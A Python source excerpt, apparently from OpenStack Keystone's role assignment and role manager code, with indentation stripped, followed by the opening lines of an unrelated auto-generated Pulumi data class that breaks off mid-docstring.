# TODO(henry-nash): We might want to consider list limiting this at some
# point in the future.
@MEMOIZE_COMPUTED_ASSIGNMENTS
def list_domains_for_user(self, user_id):
assignment_list = self.list_role_assignments(
user_id=user_id, effective=True)
# Use set() to process the list to remove any duplicates
domain_ids = list(set([x['domain_id'] for x in assignment_list
if x.get('domain_id')]))
return PROVIDERS.resource_api.list_domains_from_ids(domain_ids)
def list_domains_for_groups(self, group_ids):
assignment_list = self.list_role_assignments(
source_from_group_ids=group_ids, effective=True)
domain_ids = list(set([x['domain_id'] for x in assignment_list
if x.get('domain_id')]))
return PROVIDERS.resource_api.list_domains_from_ids(domain_ids)
def list_projects_for_groups(self, group_ids):
assignment_list = self.list_role_assignments(
source_from_group_ids=group_ids, effective=True)
project_ids = list(set([x['project_id'] for x in assignment_list
if x.get('project_id')]))
return PROVIDERS.resource_api.list_projects_from_ids(project_ids)
@notifications.role_assignment('deleted')
def _remove_role_from_user_and_project_adapter(self, role_id, user_id=None,
group_id=None,
domain_id=None,
project_id=None,
inherited_to_projects=False,
context=None):
# The parameters for this method must match the parameters for
# delete_grant so that the notifications.role_assignment decorator
# will work.
self.driver.remove_role_from_user_and_project(user_id, project_id,
role_id)
payload = {'user_id': user_id, 'project_id': project_id}
notifications.Audit.internal(
notifications.REMOVE_APP_CREDS_FOR_USER,
payload
)
self._invalidate_token_cache(
role_id, group_id, user_id, project_id, domain_id
)
def remove_role_from_user_and_project(self, user_id, tenant_id, role_id):
self._remove_role_from_user_and_project_adapter(
role_id, user_id=user_id, project_id=tenant_id)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
def _invalidate_token_cache(self, role_id, group_id, user_id, project_id,
domain_id):
if group_id:
actor_type = 'group'
actor_id = group_id
elif user_id:
actor_type = 'user'
actor_id = user_id
if domain_id:
target_type = 'domain'
target_id = domain_id
elif project_id:
target_type = 'project'
target_id = project_id
reason = (
'Invalidating the token cache because role %(role_id)s was '
'removed from %(actor_type)s %(actor_id)s on %(target_type)s '
'%(target_id)s.' %
{'role_id': role_id, 'actor_type': actor_type,
'actor_id': actor_id, 'target_type': target_type,
'target_id': target_id}
)
notifications.invalidate_token_cache_notification(reason)
@notifications.role_assignment('created')
def create_grant(self, role_id, user_id=None, group_id=None,
domain_id=None, project_id=None,
inherited_to_projects=False,
initiator=None):
role = PROVIDERS.role_api.get_role(role_id)
if domain_id:
PROVIDERS.resource_api.get_domain(domain_id)
if project_id:
project = PROVIDERS.resource_api.get_project(project_id)
# For domain specific roles, the domain of the project
# and role must match
if role['domain_id'] and project['domain_id'] != role['domain_id']:
raise exception.DomainSpecificRoleMismatch(
role_id=role_id,
project_id=project_id)
self.driver.create_grant(
role_id, user_id=user_id, group_id=group_id, domain_id=domain_id,
project_id=project_id, inherited_to_projects=inherited_to_projects
)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
def get_grant(self, role_id, user_id=None, group_id=None,
domain_id=None, project_id=None,
inherited_to_projects=False):
role_ref = PROVIDERS.role_api.get_role(role_id)
if domain_id:
PROVIDERS.resource_api.get_domain(domain_id)
if project_id:
PROVIDERS.resource_api.get_project(project_id)
self.check_grant_role_id(
role_id, user_id=user_id, group_id=group_id, domain_id=domain_id,
project_id=project_id, inherited_to_projects=inherited_to_projects
)
return role_ref
def list_grants(self, user_id=None, group_id=None,
domain_id=None, project_id=None,
inherited_to_projects=False):
if domain_id:
PROVIDERS.resource_api.get_domain(domain_id)
if project_id:
PROVIDERS.resource_api.get_project(project_id)
grant_ids = self.list_grant_role_ids(
user_id=user_id, group_id=group_id, domain_id=domain_id,
project_id=project_id, inherited_to_projects=inherited_to_projects
)
return PROVIDERS.role_api.list_roles_from_ids(grant_ids)
@notifications.role_assignment('deleted')
def delete_grant(self, role_id, user_id=None, group_id=None,
domain_id=None, project_id=None,
inherited_to_projects=False,
initiator=None):
# check if role exist before any processing
PROVIDERS.role_api.get_role(role_id)
if group_id is None:
# check if role exists on the user before revoke
self.check_grant_role_id(
role_id, user_id=user_id, group_id=None, domain_id=domain_id,
project_id=project_id,
inherited_to_projects=inherited_to_projects
)
self._invalidate_token_cache(
role_id, group_id, user_id, project_id, domain_id
)
else:
try:
# check if role exists on the group before revoke
self.check_grant_role_id(
role_id, user_id=None, group_id=group_id,
domain_id=domain_id, project_id=project_id,
inherited_to_projects=inherited_to_projects
)
if CONF.token.revoke_by_id:
self._invalidate_token_cache(
role_id, group_id, user_id, project_id, domain_id
)
except exception.GroupNotFound:
LOG.debug('Group %s not found, no tokens to invalidate.',
group_id)
if domain_id:
PROVIDERS.resource_api.get_domain(domain_id)
if project_id:
PROVIDERS.resource_api.get_project(project_id)
self.driver.delete_grant(
role_id, user_id=user_id, group_id=group_id, domain_id=domain_id,
project_id=project_id, inherited_to_projects=inherited_to_projects
)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
# The methods _expand_indirect_assignment, _list_direct_role_assignments
# and _list_effective_role_assignments below are only used on
# list_role_assignments, but they are not in its scope as nested functions
# since it would significantly increase McCabe complexity, that should be
# kept as it is in order to detect unnecessarily complex code, which is not
# this case.
def _expand_indirect_assignment(self, ref, user_id=None, project_id=None,
subtree_ids=None, expand_groups=True):
"""Return a list of expanded role assignments.
This methods is called for each discovered assignment that either needs
a group assignment expanded into individual user assignments, or needs
an inherited assignment to be applied to its children.
In all cases, if either user_id and/or project_id is specified, then we
filter the result on those values.
If project_id is specified and subtree_ids is None, then this
indicates that we are only interested in that one project. If
subtree_ids is not None, then this is an indicator that any
inherited assignments need to be expanded down the tree. The
actual subtree_ids don't need to be used as a filter here, since we
already ensured only those assignments that could affect them
were passed to this method.
If expand_groups is True then we expand groups out to a list of
assignments, one for each member of that group.
"""
def create_group_assignment(base_ref, user_id):
"""Create a group assignment from the provided ref."""
ref = copy.deepcopy(base_ref)
ref['user_id'] = user_id
indirect = ref.setdefault('indirect', {})
indirect['group_id'] = ref.pop('group_id')
return ref
def expand_group_assignment(ref, user_id):
"""Expand group role assignment.
For any group role assignment on a target, it is replaced by a list
of role assignments containing one for each user of that group on
that target.
An example of accepted ref is::
{
'group_id': group_id,
'project_id': project_id,
'role_id': role_id
}
Once expanded, it should be returned as a list of entities like the
one below, one for each each user_id in the provided group_id.
::
{
'user_id': user_id,
'project_id': project_id,
'role_id': role_id,
'indirect' : {
'group_id': group_id
}
}
Returned list will be formatted by the Controller, which will
deduce a role assignment came from group membership if it has both
'user_id' in the main body of the dict and 'group_id' in indirect
subdict.
"""
if user_id:
return [create_group_assignment(ref, user_id=user_id)]
# Note(prashkre): Try to get the users in a group,
# if a group wasn't found in the backend, users are set
# as empty list.
try:
users = PROVIDERS.identity_api.list_users_in_group(
ref['group_id'])
except exception.GroupNotFound:
LOG.warning('Group %(group)s was not found but still has role '
'assignments.', {'group': ref['group_id']})
users = []
return [create_group_assignment(ref, user_id=m['id'])
for m in users]
def expand_inherited_assignment(ref, user_id, project_id, subtree_ids,
expand_groups):
"""Expand inherited role assignments.
If expand_groups is True and this is a group role assignment on a
target, replace it by a list of role assignments containing one for
each user of that group, on every project under that target. If
expand_groups is False, then return a group assignment on an
inherited target.
If this is a user role assignment on a specific target (i.e.
project_id is specified, but subtree_ids is None) then simply
format this as a single assignment (since we are effectively
filtering on project_id). If however, project_id is None or
subtree_ids is not None, then replace this one assignment with a
list of role assignments for that user on every project under
that target.
An example of accepted ref is::
{
'group_id': group_id,
'project_id': parent_id,
'role_id': role_id,
'inherited_to_projects': 'projects'
}
Once expanded, it should be returned as a list of entities like the
one below, one for each each user_id in the provided group_id and
for each subproject_id in the project_id subtree.
::
{
'user_id': user_id,
'project_id': subproject_id,
'role_id': role_id,
'indirect' : {
'group_id': group_id,
'project_id': parent_id
}
}
Returned list will be formatted by the Controller, which will
deduce a role assignment came from group membership if it has both
'user_id' in the main body of the dict and 'group_id' in the
'indirect' subdict, as well as it is possible to deduce if it has
come from inheritance if it contains both a 'project_id' in the
main body of the dict and 'parent_id' in the 'indirect' subdict.
"""
def create_inherited_assignment(base_ref, project_id):
"""Create a project assignment from the provided ref.
base_ref can either be a project or domain inherited
assignment ref.
"""
ref = copy.deepcopy(base_ref)
indirect = ref.setdefault('indirect', {})
if ref.get('project_id'):
indirect['project_id'] = ref.pop('project_id')
else:
indirect['domain_id'] = ref.pop('domain_id')
ref['project_id'] = project_id
ref.pop('inherited_to_projects')
return ref
# Define expanded project list to which to apply this assignment
if project_id:
# Since ref is an inherited assignment and we are filtering by
# project(s), we are only going to apply the assignment to the
# relevant project(s)
project_ids = [project_id]
if subtree_ids:
project_ids += subtree_ids
# If this is a domain inherited assignment, then we know
# that all the project_ids will get this assignment. If
# it's a project inherited assignment, and the assignment
# point is an ancestor of project_id, then we know that
# again all the project_ids will get the assignment. If,
# however, the assignment point is within the subtree,
# then only a partial tree will get the assignment.
resource_api = PROVIDERS.resource_api
if ref.get('project_id'):
if ref['project_id'] in project_ids:
project_ids = (
[x['id'] for x in
resource_api.list_projects_in_subtree(
ref['project_id'])])
elif ref.get('domain_id'):
# A domain inherited assignment, so apply it to all projects
# in this domain
project_ids = (
[x['id'] for x in
PROVIDERS.resource_api.list_projects_in_domain(
ref['domain_id'])])
else:
# It must be a project assignment, so apply it to its subtree
project_ids = (
[x['id'] for x in
PROVIDERS.resource_api.list_projects_in_subtree(
ref['project_id'])])
new_refs = []
if 'group_id' in ref:
if expand_groups:
# Expand role assignment to all group members on any
# inherited target of any of the projects
for ref in expand_group_assignment(ref, user_id):
new_refs += [create_inherited_assignment(ref, proj_id)
for proj_id in project_ids]
else:
# Just place the group assignment on any inherited target
# of any of the projects
new_refs += [create_inherited_assignment(ref, proj_id)
for proj_id in project_ids]
else:
# Expand role assignment for all projects
new_refs += [create_inherited_assignment(ref, proj_id)
for proj_id in project_ids]
return new_refs
if ref.get('inherited_to_projects') == 'projects':
return expand_inherited_assignment(
ref, user_id, project_id, subtree_ids, expand_groups)
elif 'group_id' in ref and expand_groups:
return expand_group_assignment(ref, user_id)
return [ref]
def add_implied_roles(self, role_refs):
"""Expand out implied roles.
The role_refs passed in have had all inheritance and group assignments
expanded out. We now need to look at the role_id in each ref and see
if it is a prior role for some implied roles. If it is, then we need to
duplicate that ref, one for each implied role. We store the prior role
in the indirect dict that is part of such a duplicated ref, so that a
caller can determine where the assignment came from.
"""
def _make_implied_ref_copy(prior_ref, implied_role_id):
# Create a ref for an implied role from the ref of a prior role,
# setting the new role_id to be the implied role and the indirect
# role_id to be the prior role
implied_ref = copy.deepcopy(prior_ref)
implied_ref['role_id'] = implied_role_id
indirect = implied_ref.setdefault('indirect', {})
indirect['role_id'] = prior_ref['role_id']
return implied_ref
if not CONF.token.infer_roles:
return role_refs
try:
implied_roles_cache = {}
role_refs_to_check = list(role_refs)
ref_results = list(role_refs)
checked_role_refs = list()
while(role_refs_to_check):
next_ref = role_refs_to_check.pop()
checked_role_refs.append(next_ref)
next_role_id = next_ref['role_id']
if next_role_id in implied_roles_cache:
implied_roles = implied_roles_cache[next_role_id]
else:
implied_roles = (
PROVIDERS.role_api.list_implied_roles(next_role_id))
implied_roles_cache[next_role_id] = implied_roles
for implied_role in implied_roles:
implied_ref = (
_make_implied_ref_copy(
next_ref, implied_role['implied_role_id']))
if implied_ref in checked_role_refs:
# Avoid traversing a cycle
continue
else:
ref_results.append(implied_ref)
role_refs_to_check.append(implied_ref)
except exception.NotImplemented:
LOG.error('Role driver does not support implied roles.')
return ref_results
def _filter_by_role_id(self, role_id, ref_results):
# if we arrive here, we need to filer by role_id.
filter_results = []
for ref in ref_results:
if ref['role_id'] == role_id:
filter_results.append(ref)
return filter_results
def _strip_domain_roles(self, role_refs):
"""Post process assignment list for domain roles.
Domain roles are only designed to do the job of inferring other roles
and since that has been done before this method is called, we need to
remove any assignments that include a domain role.
"""
def _role_is_global(role_id):
ref = PROVIDERS.role_api.get_role(role_id)
return (ref['domain_id'] is None)
filter_results = []
for ref in role_refs:
if _role_is_global(ref['role_id']):
filter_results.append(ref)
return filter_results
def _list_effective_role_assignments(self, role_id, user_id, group_id,
domain_id, project_id, subtree_ids,
inherited, source_from_group_ids,
strip_domain_roles):
"""List role assignments in effective mode.
When using effective mode, besides the direct assignments, the indirect
ones that come from grouping or inheritance are retrieved and will then
be expanded.
The resulting list of assignments will be filtered by the provided
parameters. If subtree_ids is not None, then we also want to include
all subtree_ids in the filter as well. Since we are in effective mode,
group can never act as a filter (since group assignments are expanded
into user roles) and domain can only be filter if we want non-inherited
assignments, since domains can't inherit assignments.
The goal of this method is to only ask the driver for those
assignments as could effect the result based on the parameter filters
specified, hence avoiding retrieving a huge list.
"""
def list_role_assignments_for_actor(
role_id, inherited, user_id=None, group_ids=None,
project_id=None, subtree_ids=None, domain_id=None):
"""List role assignments for actor on target.
List direct and indirect assignments for an actor, optionally
for a given target (i.e. projects or domain).
:param role_id: List for a specific role, can be None meaning all
roles
:param inherited: Indicates whether inherited assignments or only
direct assignments are required. If None, then
both are required.
:param user_id: If not None, list only assignments that affect this
user.
:param group_ids: A list of groups required. Only one of user_id
and group_ids can be specified
:param project_id: If specified, only include those assignments
that affect at least this project, with
additionally any projects specified in
subtree_ids
:param subtree_ids: The list of projects in the subtree. If
specified, also include those assignments that
affect these projects. These projects are
guaranteed to be in the same domain as the
project specified in project_id. subtree_ids
can only be specified if project_id has also
been specified.
:param domain_id: If specified, only include those assignments
that affect this domain - by definition this will
not include any inherited assignments
:returns: List of assignments matching the criteria. Any inherited
or group assignments that could affect the resulting
response are included.
"""
project_ids_of_interest = None
if project_id:
if subtree_ids:
project_ids_of_interest = subtree_ids + [project_id]
else:
project_ids_of_interest = [project_id]
# List direct project role assignments
non_inherited_refs = []
if inherited is False or inherited is None:
# Get non inherited assignments
non_inherited_refs = self.driver.list_role_assignments(
role_id=role_id, domain_id=domain_id,
project_ids=project_ids_of_interest, user_id=user_id,
group_ids=group_ids, inherited_to_projects=False)
inherited_refs = []
if inherited is True or inherited is None:
# Get inherited assignments
if project_id:
# The project and any subtree are guaranteed to be owned by
# the same domain, so since we are filtering by these
# specific projects, then we can only get inherited
# assignments from their common domain or from any of
# their parents projects.
# List inherited assignments from the project's domain
proj_domain_id = PROVIDERS.resource_api.get_project(
project_id)['domain_id']
inherited_refs += self.driver.list_role_assignments(
role_id=role_id, domain_id=proj_domain_id,
user_id=user_id, group_ids=group_ids,
inherited_to_projects=True)
# For inherited assignments from projects, since we know
# they are from the same tree the only places these can
# come from are from parents of the main project or
# inherited assignments on the project or subtree itself.
source_ids = [project['id'] for project in
PROVIDERS.resource_api.list_project_parents(
project_id)]
if subtree_ids:
source_ids += project_ids_of_interest
if source_ids:
inherited_refs += self.driver.list_role_assignments(
role_id=role_id, project_ids=source_ids,
user_id=user_id, group_ids=group_ids,
inherited_to_projects=True)
else:
# List inherited assignments without filtering by target
inherited_refs = self.driver.list_role_assignments(
role_id=role_id, user_id=user_id, group_ids=group_ids,
inherited_to_projects=True)
return non_inherited_refs + inherited_refs
# If filtering by group or inherited domain assignment the list is
# guaranteed to be empty
if group_id or (domain_id and inherited):
return []
if user_id and source_from_group_ids:
# You can't do both - and since source_from_group_ids is only used
# internally, this must be a coding error by the caller.
msg = _('Cannot list assignments sourced from groups and filtered '
'by user ID.')
raise exception.UnexpectedError(msg)
# If filtering by domain, then only non-inherited assignments are
# relevant, since domains don't inherit assignments
inherited = False if domain_id else inherited
# List user or explicit group assignments.
# Due to the need to expand implied roles, this call will skip
# filtering by role_id and instead return the whole set of roles.
# Matching on the specified role is performed at the end.
direct_refs = list_role_assignments_for_actor(
role_id=None, user_id=user_id, group_ids=source_from_group_ids,
project_id=project_id, subtree_ids=subtree_ids,
domain_id=domain_id, inherited=inherited)
# And those from the user's groups, so long as we are not restricting
# to a set of source groups (in which case we already got those
# assignments in the direct listing above).
group_refs = []
if not source_from_group_ids and user_id:
group_ids = self._get_group_ids_for_user_id(user_id)
if group_ids:
group_refs = list_role_assignments_for_actor(
role_id=None, project_id=project_id,
subtree_ids=subtree_ids, group_ids=group_ids,
domain_id=domain_id, inherited=inherited)
# Expand grouping and inheritance on retrieved role assignments
refs = []
expand_groups = (source_from_group_ids is None)
for ref in (direct_refs + group_refs):
refs += self._expand_indirect_assignment(
ref, user_id, project_id, subtree_ids, expand_groups)
refs = self.add_implied_roles(refs)
if strip_domain_roles:
refs = self._strip_domain_roles(refs)
if role_id:
refs = self._filter_by_role_id(role_id, refs)
return refs
def _list_direct_role_assignments(self, role_id, user_id, group_id, system,
domain_id, project_id, subtree_ids,
inherited):
"""List role assignments without applying expansion.
Returns a list of direct role assignments, where their attributes match
the provided filters. If subtree_ids is not None, then we also want to
include all subtree_ids in the filter as well.
"""
group_ids = [group_id] if group_id else None
project_ids_of_interest = None
if project_id:
if subtree_ids:
project_ids_of_interest = subtree_ids + [project_id]
else:
project_ids_of_interest = [project_id]
project_and_domain_assignments = []
if not system:
project_and_domain_assignments = self.driver.list_role_assignments(
role_id=role_id, user_id=user_id, group_ids=group_ids,
domain_id=domain_id, project_ids=project_ids_of_interest,
inherited_to_projects=inherited)
system_assignments = []
if system or (not project_id and not domain_id and not system):
if user_id:
assignments = self.list_system_grants_for_user(user_id)
for assignment in assignments:
system_assignments.append(
{'system': {'all': True},
'user_id': user_id,
'role_id': assignment['id']}
)
elif group_id:
assignments = self.list_system_grants_for_group(group_id)
for assignment in assignments:
system_assignments.append(
{'system': {'all': True},
'group_id': group_id,
'role_id': assignment['id']}
)
else:
assignments = self.list_all_system_grants()
for assignment in assignments:
a = {}
if assignment['type'] == self._GROUP_SYSTEM:
a['group_id'] = assignment['actor_id']
elif assignment['type'] == self._USER_SYSTEM:
a['user_id'] = assignment['actor_id']
a['role_id'] = assignment['role_id']
a['system'] = {'all': True}
system_assignments.append(a)
for i, assignment in enumerate(system_assignments):
if role_id and role_id != assignment['role_id']:
system_assignments.pop(i)
assignments = []
for assignment in itertools.chain(
project_and_domain_assignments, system_assignments):
assignments.append(assignment)
return assignments
def list_role_assignments(self, role_id=None, user_id=None, group_id=None,
system=None, domain_id=None, project_id=None,
include_subtree=False, inherited=None,
effective=None, include_names=False,
source_from_group_ids=None,
strip_domain_roles=True):
"""List role assignments, honoring effective mode and provided filters.
Returns a list of role assignments, where their attributes match the
provided filters (role_id, user_id, group_id, domain_id, project_id and
inherited). If include_subtree is True, then assignments on all
descendants of the project specified by project_id are also included.
The inherited filter defaults to None, meaning to get both
non-inherited and inherited role assignments.
If effective mode is specified, this means that rather than simply
return the assignments that match the filters, any group or
inheritance assignments will be expanded. Group assignments will
become assignments for all the users in that group, and inherited
assignments will be shown on the projects below the assignment point.
Think of effective mode as being the list of assignments that actually
affect a user, for example the roles that would be placed in a token.
If include_names is set to true the entities' names are returned
in addition to their id's.
source_from_group_ids is a list of group IDs and, if specified, then
only those assignments that are derived from membership of these groups
are considered, and any such assignments will not be expanded into
their user membership assignments. This is different to a group filter
of the resulting list, instead being a restriction on which assignments
should be considered before expansion of inheritance. This option is
only used internally (i.e. it is not exposed at the API level) and is
only supported in effective mode (since in regular mode there is no
difference between this and a group filter, other than it is a list of
groups).
In effective mode, any domain specific roles are usually stripped from
the returned assignments (since such roles are not placed in tokens).
This stripping can be disabled by specifying strip_domain_roles=False,
which is useful for internal calls like trusts which need to examine
the full set of roles.
"""
subtree_ids = None
if project_id and include_subtree:
subtree_ids = (
[x['id'] for x in
PROVIDERS.resource_api.list_projects_in_subtree(
project_id)])
if system != 'all':
system = None
if effective:
role_assignments = self._list_effective_role_assignments(
role_id, user_id, group_id, domain_id, project_id,
subtree_ids, inherited, source_from_group_ids,
strip_domain_roles)
else:
role_assignments = self._list_direct_role_assignments(
role_id, user_id, group_id, system, domain_id, project_id,
subtree_ids, inherited)
if include_names:
return self._get_names_from_role_assignments(role_assignments)
return role_assignments
def _get_names_from_role_assignments(self, role_assignments):
role_assign_list = []
for role_asgmt in role_assignments:
new_assign = copy.deepcopy(role_asgmt)
for key, value in role_asgmt.items():
if key == 'domain_id':
_domain = PROVIDERS.resource_api.get_domain(value)
new_assign['domain_name'] = _domain['name']
elif key == 'user_id':
try:
# Note(knikolla): Try to get the user, otherwise
# if the user wasn't found in the backend
# use empty values.
_user = PROVIDERS.identity_api.get_user(value)
except exception.UserNotFound:
msg = ('User %(user)s not found in the'
' backend but still has role assignments.')
LOG.warning(msg, {'user': value})
new_assign['user_name'] = ''
new_assign['user_domain_id'] = ''
new_assign['user_domain_name'] = ''
else:
new_assign['user_name'] = _user['name']
new_assign['user_domain_id'] = _user['domain_id']
new_assign['user_domain_name'] = (
PROVIDERS.resource_api.get_domain(
_user['domain_id'])['name'])
elif key == 'group_id':
try:
# Note(knikolla): Try to get the group, otherwise
# if the group wasn't found in the backend
# use empty values.
_group = PROVIDERS.identity_api.get_group(value)
except exception.GroupNotFound:
msg = ('Group %(group)s not found in the'
' backend but still has role assignments.')
LOG.warning(msg, {'group': value})
new_assign['group_name'] = ''
new_assign['group_domain_id'] = ''
new_assign['group_domain_name'] = ''
else:
new_assign['group_name'] = _group['name']
new_assign['group_domain_id'] = _group['domain_id']
new_assign['group_domain_name'] = (
PROVIDERS.resource_api.get_domain(
_group['domain_id'])['name'])
elif key == 'project_id':
_project = PROVIDERS.resource_api.get_project(value)
new_assign['project_name'] = _project['name']
new_assign['project_domain_id'] = _project['domain_id']
new_assign['project_domain_name'] = (
PROVIDERS.resource_api.get_domain(
_project['domain_id'])['name'])
elif key == 'role_id':
_role = PROVIDERS.role_api.get_role(value)
new_assign['role_name'] = _role['name']
if _role['domain_id'] is not None:
new_assign['role_domain_id'] = _role['domain_id']
new_assign['role_domain_name'] = (
PROVIDERS.resource_api.get_domain(
_role['domain_id'])['name'])
role_assign_list.append(new_assign)
return role_assign_list
def delete_group_assignments(self, group_id):
# FIXME(lbragstad): This should be refactored in the Rocky release so
# that we can pass the group_id to the system assignment backend like
# we do with the project and domain assignment backend. Holding off on
# this because it will require an interface change to the backend,
# making it harder to backport for Queens RC.
self.driver.delete_group_assignments(group_id)
system_assignments = self.list_system_grants_for_group(group_id)
for assignment in system_assignments:
self.delete_system_grant_for_group(group_id, assignment['id'])
def delete_user_assignments(self, user_id):
# FIXME(lbragstad): This should be refactored in the Rocky release so
# that we can pass the user_id to the system assignment backend like we
# do with the project and domain assignment backend. Holding off on
# this because it will require an interface change to the backend,
# making it harder to backport for Queens RC.
self.driver.delete_user_assignments(user_id)
system_assignments = self.list_system_grants_for_user(user_id)
for assignment in system_assignments:
self.delete_system_grant_for_user(user_id, assignment['id'])
def check_system_grant_for_user(self, user_id, role_id):
"""Check if a user has a specific role on the system.
:param user_id: the ID of the user in the assignment
:param role_id: the ID of the system role in the assignment
:raises keystone.exception.RoleAssignmentNotFound: if the user doesn't
have a role assignment matching the role_id on the system
"""
target_id = self._SYSTEM_SCOPE_TOKEN
inherited = False
return self.driver.check_system_grant(
role_id, user_id, target_id, inherited
)
def list_system_grants_for_user(self, user_id):
"""Return a list of roles the user has on the system.
:param user_id: the ID of the user
:returns: a list of role assignments the user has system-wide
"""
target_id = self._SYSTEM_SCOPE_TOKEN
assignment_type = self._USER_SYSTEM
grants = self.driver.list_system_grants(
user_id, target_id, assignment_type
)
grant_ids = []
for grant in grants:
grant_ids.append(grant['role_id'])
return PROVIDERS.role_api.list_roles_from_ids(grant_ids)
def create_system_grant_for_user(self, user_id, role_id):
"""Grant a user a role on the system.
:param user_id: the ID of the user
:param role_id: the ID of the role to grant on the system
"""
role = PROVIDERS.role_api.get_role(role_id)
if role.get('domain_id'):
raise exception.ValidationError(
'Role %(role_id)s is a domain-specific role. Unable to use '
'a domain-specific role in a system assignment.' % {
'role_id': role_id
}
)
target_id = self._SYSTEM_SCOPE_TOKEN
assignment_type = self._USER_SYSTEM
inherited = False
self.driver.create_system_grant(
role_id, user_id, target_id, assignment_type, inherited
)
def delete_system_grant_for_user(self, user_id, role_id):
"""Remove a system grant from a user.
:param user_id: the ID of the user
:param role_id: the ID of the role to remove from the user on the
system
:raises keystone.exception.RoleAssignmentNotFound: if the user doesn't
have a role assignment with role_id on the system
"""
target_id = self._SYSTEM_SCOPE_TOKEN
inherited = False
self.driver.delete_system_grant(role_id, user_id, target_id, inherited)
def check_system_grant_for_group(self, group_id, role_id):
"""Check if a group has a specific role on the system.
:param group_id: the ID of the group in the assignment
:param role_id: the ID of the system role in the assignment
:raises keystone.exception.RoleAssignmentNotFound: if the group doesn't
have a role assignment matching the role_id on the system
"""
target_id = self._SYSTEM_SCOPE_TOKEN
inherited = False
return self.driver.check_system_grant(
role_id, group_id, target_id, inherited
)
def list_system_grants_for_group(self, group_id):
"""Return a list of roles the group has on the system.
:param group_id: the ID of the group
:returns: a list of role assignments the group has system-wide
"""
target_id = self._SYSTEM_SCOPE_TOKEN
assignment_type = self._GROUP_SYSTEM
grants = self.driver.list_system_grants(
group_id, target_id, assignment_type
)
grant_ids = []
for grant in grants:
grant_ids.append(grant['role_id'])
return PROVIDERS.role_api.list_roles_from_ids(grant_ids)
def create_system_grant_for_group(self, group_id, role_id):
"""Grant a group a role on the system.
:param group_id: the ID of the group
:param role_id: the ID of the role to grant on the system
"""
role = PROVIDERS.role_api.get_role(role_id)
if role.get('domain_id'):
raise exception.ValidationError(
'Role %(role_id)s is a domain-specific role. Unable to use '
'a domain-specific role in a system assignment.' % {
'role_id': role_id
}
)
target_id = self._SYSTEM_SCOPE_TOKEN
assignment_type = self._GROUP_SYSTEM
inherited = False
self.driver.create_system_grant(
role_id, group_id, target_id, assignment_type, inherited
)
def delete_system_grant_for_group(self, group_id, role_id):
"""Remove a system grant from a group.
:param group_id: the ID of the group
:param role_id: the ID of the role to remove from the group on the
system
:raises keystone.exception.RoleAssignmentNotFound: if the group doesn't
have a role assignment with role_id on the system
"""
target_id = self._SYSTEM_SCOPE_TOKEN
inherited = False
self.driver.delete_system_grant(
role_id, group_id, target_id, inherited
)
def list_all_system_grants(self):
"""Return a list of all system grants."""
actor_id = None
target_id = self._SYSTEM_SCOPE_TOKEN
assignment_type = None
return self.driver.list_system_grants(
actor_id, target_id, assignment_type
)
class RoleManager(manager.Manager):
"""Default pivot point for the Role backend."""
driver_namespace = 'keystone.role'
_provides_api = 'role_api'
_ROLE = 'role'
def __init__(self):
# If there is a specific driver specified for role, then use it.
# Otherwise retrieve the driver type from the assignment driver.
role_driver = CONF.role.driver
if role_driver is None:
# Explicitly load the assignment manager object
assignment_driver = CONF.assignment.driver
assignment_manager_obj = manager.load_driver(
Manager.driver_namespace,
assignment_driver)
role_driver = assignment_manager_obj.default_role_driver()
super(RoleManager, self).__init__(role_driver)
@MEMOIZE
def get_role(self, role_id):
return self.driver.get_role(role_id)
def get_unique_role_by_name(self, role_name, hints=None):
if not hints:
hints = driver_hints.Hints()
hints.add_filter("name", role_name, case_sensitive=True)
found_roles = PROVIDERS.role_api.list_roles(hints)
if not found_roles:
raise exception.RoleNotFound(
_("Role %s is not defined") % role_name
)
elif len(found_roles) == 1:
return {'id': found_roles[0]['id']}
else:
raise exception.AmbiguityError(resource='role',
name=role_name)
def create_role(self, role_id, role, initiator=None):
ret = self.driver.create_role(role_id, role)
notifications.Audit.created(self._ROLE, role_id, initiator)
if MEMOIZE.should_cache(ret):
self.get_role.set(ret, self, role_id)
return ret
@manager.response_truncated
def list_roles(self, hints=None):
return self.driver.list_roles(hints or driver_hints.Hints())
def update_role(self, role_id, role, initiator=None):
original_role = self.driver.get_role(role_id)
if ('domain_id' in role and
role['domain_id'] != original_role['domain_id']):
raise exception.ValidationError(
message=_('Update of `domain_id` is not allowed.'))
ret = self.driver.update_role(role_id, role)
notifications.Audit.updated(self._ROLE, role_id, initiator)
self.get_role.invalidate(self, role_id)
return ret
def delete_role(self, role_id, initiator=None):
PROVIDERS.assignment_api.delete_role_assignments(role_id)
PROVIDERS.assignment_api._send_app_cred_notification_for_role_removal(
role_id
)
self.driver.delete_role(role_id)
notifications.Audit.deleted(self._ROLE, role_id, initiator)
self.get_role.invalidate(self, role_id)
reason = (
'Invalidating the token cache because role %(role_id)s has been '
'removed. Role assignments for users will be recalculated and '
'enforced accordingly the next time they authenticate or validate '
'a token' % {'role_id': role_id}
)
notifications.invalidate_token_cache_notification(reason)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
# TODO(ayoung): Add notification
def create_implied_role(self, prior_role_id, implied_role_id):
implied_role = self.driver.get_role(implied_role_id)
prior_role = self.driver.get_role(prior_role_id)
if implied_role['name'] in CONF.assignment.prohibited_implied_role:
raise exception.InvalidImpliedRole(role_id=implied_role_id)
if prior_role['domain_id'] is None and implied_role['domain_id']:
msg = _('Global role cannot imply a domain-specific role')
raise exception.InvalidImpliedRole(msg,
role_id=implied_role_id)
response = self.driver.create_implied_role(
prior_role_id, implied_role_id)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
return response
def delete_implied_role(self, prior_role_id, implied_role_id):
self.driver.delete_implied_role(prior_role_id, implied_role_id)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
| StarcoderdataPython |
3285863 | <gh_stars>0
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from . import utilities, tables
class GetNetworkContainerResult:
"""
A collection of values returned by getNetworkContainer.
"""
def __init__(__self__, atlas_cidr_block=None, azure_subscription_id=None, container_id=None, gcp_project_id=None, network_name=None, project_id=None, provider_name=None, provisioned=None, region=None, region_name=None, vnet_name=None, vpc_id=None, id=None):
if atlas_cidr_block and not isinstance(atlas_cidr_block, str):
raise TypeError("Expected argument 'atlas_cidr_block' to be a str")
__self__.atlas_cidr_block = atlas_cidr_block
"""
